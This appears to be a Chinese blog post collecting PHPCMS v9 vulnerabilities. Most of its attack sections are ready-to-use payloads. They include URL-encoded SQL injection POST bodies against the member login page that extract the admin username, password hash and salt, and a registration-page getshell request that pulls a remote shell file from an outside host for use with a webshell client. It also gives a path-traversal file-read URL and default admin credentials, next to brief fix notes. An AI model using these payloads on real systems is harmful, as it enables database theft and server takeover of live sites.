phpcms漏洞

paynexss

浏览: 114419 次

最近访客更多访客>>

java_key_code

Jxdwuao

temful

oma1989

博主相关

博客

微博

相册

留言

关于我

文章分类

社区版块

存档分类

phpcms

最近某位大牛说，将放出3个phpcms的0day漏洞，目前我所了解到的已经有2个phpcms漏洞被流传开来，并放出了poc。phpcms应用范围还是比较广的，在此记录分享一下几个最新的phpcms漏洞。

免责申明：文章中的工具等仅供个人测试研究，请在下载后24小时内删除，不得用于商业或非法用途，否则后果自负

phpcms sql漏洞

Poc

存在sql注入漏洞的页面：
http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=login
获取当前数据库，post：

forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bdatabase())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=验证码&dosubmit=%E7%99%BB%E5%BD%95

获取当前用户，post：

1
2
3

forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2buser())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=验证码&dosubmit=%E7%99%BB%E5%BD%95
获取表名：
forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2btable_name%2bfrom%2binformation_schema.tables%2bwhere%2btable_schema='phpcmsv9'%2blimit%2b0%252c1)%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=验证码&dosubmit=%E7%99%BB%E5%BD%95

若要获取其他表名，修改limit即可。
获取用户名:

forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2busername%2bfrom%2bv9_admin%2blimit%2b0%252c1)%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=验证码&dosubmit=%E7%99%BB%E5%BD%95

获取密码：

forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bpassword%2bfrom%2bv9_admin%2blimit%2b0%252c1)%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=验证码&dosubmit=%E7%99%BB%E5%BD%95

获取到的密码为30位的md5，一般的MD5是32位，所以我们需要再获取后2位：

orward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(substring((select%2bpassword%2bfrom%2bv9_admin%2blimit%2b0%252c1)%252c-2%252c2))%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=验证码&dosubmit=%E7%99%BB%E5%BD%95

phpcms是加盐（salt）的，获取salt:

forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bencrypt%2bfrom%2bv9_admin%2blimit%2b0%252c1)%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523&code=验证码&dosubmit=%E7%99%BB%E5%BD%95

以上Poc来自：https://www.unhonker.com/bug/1834.html

exp漏洞利用脚本

exp利用脚本在这里不公开放出了，大家可以利用在线检测平台进行检测：https://www.seebug.org/monster/
exp脚本可以参考：https://www.waitalone.cn/phpcmsv9-authkey-exp.html
漏洞细节请参考：http://mp.weixin.qq.com/s/cI-wbQyX-3WLhxJ5kqez4A

漏洞修复方案

去掉modules\content\down.php文件

phpcms注册页面getshell漏洞

存在的漏洞：php远程文件包含、任意文件上传
漏洞利用点：phpcms注册页面
利用类型：http post请求导致任意文件上传+getshell

Post Poc

1	siteid=1&modelid=11&username=newbie&password=newbie&email=newbie@qq.com&info[content]=<img src=http://shhdmqz.com/newbie.txt?.php#.jpg>&dosubmit=1&protocol=

注意：http://shhdmqz.com/newbie.txt为远程服务器上的shell文件，这个漏洞利用了远程文件包含与文件上传漏洞。

漏洞利用细节

　　访问注册页面发送post包，重构info字段内容，写入远程包含的文件地址《img src=http://shhdmqz.com/newbie.txt?.php#.jpg》，newbie.txt为文件名，?.php#.jpg为构造的文件名，为了绕过后缀名限制。回包将会有报错信息，但文件可以上传成功，且报错信息中含有上传的文件路径，可用菜刀链接。

exp漏洞利用脚本

exp利用脚本在这里不公开放出了，大家可以利用在线检测平台进行检测：https://www.seebug.org/monster/

漏洞修复方案

暂时性修复：

关闭注册页面
关闭远程文件包含，即关闭allow_url_fopen

彻底性修复：
修改phpcms/libs/classes/attachement.class.php文件中的download函数在
foreach($remotefileurls as $k=>$file)循环中，大约是167行左右的位置，将

1	if(strpos($file, '://') === false \|\| strpos($file, $upload_url) !== false) continue; $filename = fileext($file);

修改成

1	$filename = fileext($k);

关于文件包含漏洞，可参考：文件包含漏洞

任意文件读取漏洞

1	index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/error_log.php

phpcms敏感信息

默认账号密码：phpcms/phpcms
默认后台： http://www.xx.com/index.php?m=admin&c=index&a=login&pc_hash=
会员中心地址：index.php?m=member&c=index&a=login

分享到：

java.util.regex.PatternSyntaxException: ... | 文件包含漏洞(绕过姿势)

2017-04-30 22:29
浏览 1250
评论(0)
分类:互联网
查看更多

发表评论

您还没有登录,请您登录后再发表评论

最近访客更多访客>>

博主相关

文章分类

社区版块

存档分类

最新评论

phpcms漏洞

phpcms sql漏洞

Poc

exp漏洞利用脚本

漏洞修复方案

phpcms注册页面getshell漏洞

Post Poc

漏洞利用细节

exp漏洞利用脚本

漏洞修复方案

任意文件读取漏洞

phpcms敏感信息

评论

发表评论

相关推荐

最近访客 更多访客>>

博主相关

文章分类

社区版块

存档分类

最新评论

phpcms漏洞

phpcms sql漏洞

Poc

exp漏洞利用脚本

漏洞修复方案

phpcms注册页面getshell漏洞

Post Poc

漏洞利用细节

exp漏洞利用脚本

漏洞修复方案

任意文件读取漏洞

phpcms敏感信息

评论

发表评论

相关推荐

最近访客更多访客>>